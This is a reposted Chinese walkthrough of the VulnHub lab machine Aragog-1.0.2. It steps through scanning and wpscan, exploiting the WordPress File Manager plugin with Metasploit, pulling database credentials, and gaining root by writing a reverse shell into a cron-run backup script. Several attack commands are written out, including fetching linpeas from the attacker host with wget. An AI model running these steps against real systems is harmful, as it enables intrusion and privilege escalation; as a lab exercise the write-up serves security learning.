IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root -> 正文阅读

[系统运维]渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root

靶机介绍

下载地址:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/
作者Mansoor R在VulnHub上上传了哈利波特系列的三个靶机,以哈利波特为故事背景,玩家需要找到这三个靶机中的共8个魂器,打败伏地魔!这就冲起来!
首先是第一个靶机Aragog,以《哈利波特·密室》中的海格饲养的大蜘蛛阿拉戈命名,题目中提示这个靶机里面有两个魂器。

渗透过程

获取ip

从VlunHub上下载靶机,在virtualbox上打开,设置网络模式为桥接,让靶机和kali以及主机在一个局域网里。

我们挑战的第一步是先进行主机发现 arp-scan -l

PCS Systemtechnik GmbH这一行就是靶机的IP。

信息收集

接下来,扫描开放端口以了解目标上暴露的服务

nmap -A -T4 -p- 172.16.53.58

它向我展示了目标上只有 HTTP 和ssh可用

网站信息收集

只有一张图片

爆破一下网站目录

dirb http://172.16.53.58

我们尝试访问blog这个目录

我们能发现这个站点是利用wordpress搭建的

既然是wordpress,我决定用wpscan枚举一下

(ps:wpscan是一个扫描WordPress漏洞的扫描器)

去注册个免费的账号获取api-token

https://wpscan.com/

wpscan --api-token=免费版的就行 --url= http://172.16.53.58/blog -e p --plugins-detection aggressive

扫出3个问题,全是File Manager的漏洞 ?

漏洞利用

msf getshell

msf检索漏洞exp

search wordpress File Manager

use 0

set rhosts 172.16.53.58

set targeturi /blog

set lhost 172.16.53.31

run

我们成功拿到了shell

我们利用python打开一个交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

wordpress搭建的网站mysql账号密码会记录在/etc/wordpress目录里的config-default.php 文件里面

在里面看到了数据库的root密码

通过账密登录MySQL数据库

在wordpress数据库下,wp_users表中找到一个登录记录

解密后我们得到了账号的密码

尝试ssh登录

成功登录

我们在当前目录下发现了第一个魂器

提权

我们在kali上面启动一个python服务器

python -m SimpleHTTPServer 2333

接下来利用wget 把提权漏洞检测脚本下载到靶机/tmp这个目录下

wget 172.16.53.31:2333/linpeas.sh

提升一下linpeas.sh 的权限 ??chmod 777 linpeas.sh

执行一下 ./linpeas.sh

运行脚本后发现了俩个CVE漏洞 经过实际测试都没能成功提权

在这一处我们能发现一个隐藏的脚本文件 .backup.sh

我们尝试去访问

这个脚本的大概意思是,把上传的文件复制到tmp这个目录里 ?

属于每过一段时间就会自动运行的那种

在kali上下载pspy64,然后复制到靶机/tmp目录下。
pspy64地址:GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions

还是利用刚刚的方法wegt下载到靶机的tmp目录下

执行后我们能发现这个脚本的UID是0

?

那说明我们向这个脚本写入反弹shell 就能获取到root权限了

创建反弹shell网站 Online - Reverse Shell Generator

我们输入kali的ip地址就能生成一串反弹shell代码

把反弹shell的代码写入脚本文件中

在kali上进行监听

我们成功拿到了root权限

我们在当前目录下发现了第二个魂器

?

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-05-08 08:30:52  更:2022-05-08 08:32:53 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 18:15:14-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码